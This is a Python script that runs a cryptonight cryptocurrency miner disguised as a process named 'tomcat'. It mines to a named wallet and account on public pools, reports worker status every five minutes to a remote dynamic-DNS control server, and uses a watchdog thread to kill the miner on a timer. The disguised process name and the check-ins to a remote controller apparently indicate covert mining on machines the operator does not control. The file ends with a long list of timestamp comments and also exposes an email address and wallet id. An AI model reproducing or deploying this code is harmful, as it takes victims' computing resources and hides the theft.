import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:49:05.899310
#2018-02-17 16:35:02.585928
#2018-02-17 18:23:07.125712
#2018-02-17 20:11:05.964218
#2018-02-17 21:59:05.427402
#2018-02-17 23:43:05.881667
#2018-02-18 01:33:05.573195
#2018-02-18 03:18:06.110016
#2018-02-18 05:07:01.677854
#2018-02-18 06:58:01.547097
#2018-02-18 08:46:04.385495
#2018-02-18 10:33:04.344336
#2018-02-18 12:18:02.127737
#2018-02-18 14:05:01.418101
#2018-02-18 15:55:06.144071
#2018-02-18 17:44:07.839858
#2018-02-18 19:32:02.200061
#2018-02-18 21:17:06.681844
#2018-02-18 23:05:08.133371
#2018-02-19 00:52:07.387302
#2018-02-19 02:39:01.251703
#2018-02-19 04:26:02.142012
#2018-02-19 06:11:03.836199
#2018-02-19 07:58:06.137714
#2018-02-19 09:49:08.214530
#2018-02-19 11:37:09.422684
#2018-02-19 13:24:01.482647
#2018-02-19 15:11:07.995790
#2018-02-19 16:58:07.714736
#2018-02-19 18:45:09.015186
#2018-02-19 20:34:03.755658
#2018-02-19 22:20:09.846645
#2018-02-20 00:05:08.972742
#2018-02-20 01:53:05.394892
#2018-02-20 03:43:05.324234
#2018-02-20 05:28:04.273528
#2018-02-20 07:12:02.106571
#2018-02-20 08:57:06.423488
#2018-02-20 10:40:08.090729
#2018-02-20 12:26:01.792450
#2018-02-20 14:12:05.099645
#2018-02-20 15:56:01.719928
#2018-02-20 17:42:08.116656
#2018-02-20 19:32:01.967718
#2018-02-20 21:18:04.926416
#2018-02-20 23:02:07.738274
#2018-02-21 00:47:07.150947
#2018-02-21 02:34:04.000520
#2018-02-21 04:22:04.248440
#2018-02-21 06:08:04.738432
#2018-02-21 07:55:03.772206
#2018-02-21 09:40:07.959332
#2018-02-21 11:29:08.013752
#2018-02-21 13:18:04.327989
#2018-02-21 15:03:01.876899
#2018-02-21 16:53:09.443301
#2018-02-21 18:43:06.240046
#2018-02-21 20:28:07.231757
#2018-02-21 22:15:09.260989
#2018-02-22 00:04:08.068564
#2018-02-22 01:52:07.501068
#2018-02-22 03:39:01.298473
#2018-02-22 05:25:06.162956
#2018-02-22 07:10:08.628217
#2018-02-22 08:57:04.581370
#2018-02-22 10:45:09.142856
#2018-02-22 12:31:04.695124
#2018-02-22 14:15:05.636661
#2018-02-22 16:02:06.142401
#2018-02-22 17:49:07.243598
#2018-02-22 19:37:06.844722
#2018-02-22 21:30:02.367470
#2018-02-22 23:16:08.108646
#2018-02-23 01:03:08.328179
#2018-02-23 02:51:05.372203
#2018-02-23 04:33:05.337774
#2018-02-23 06:19:07.013225
#2018-02-23 08:08:02.159745
#2018-02-23 10:21:07.359255
#2018-02-23 12:16:05.079915
#2018-02-23 14:03:02.139140
#2018-02-23 15:55:07.424736
#2018-02-23 17:40:03.402283
#2018-02-23 19:26:04.728272
#2018-02-23 21:09:07.623723
#2018-02-23 22:54:08.914292
#2018-02-24 00:42:07.701752
#2018-02-24 02:33:07.640142
#2018-02-24 04:26:05.883043
#2018-02-24 06:11:04.499221
#2018-02-24 07:58:07.450362
#2018-02-24 09:43:01.573065
#2018-02-24 11:38:04.470340
#2018-02-24 13:28:06.675593
#2018-02-24 15:17:05.404142
#2018-02-24 17:06:06.524781
#2018-02-24 18:57:05.045767
#2018-02-24 20:44:01.362165
#2018-02-24 22:57:07.134207
#2018-02-25 02:14:01.359651
#2018-02-25 05:44:07.278106
#2018-02-25 11:37:04.560238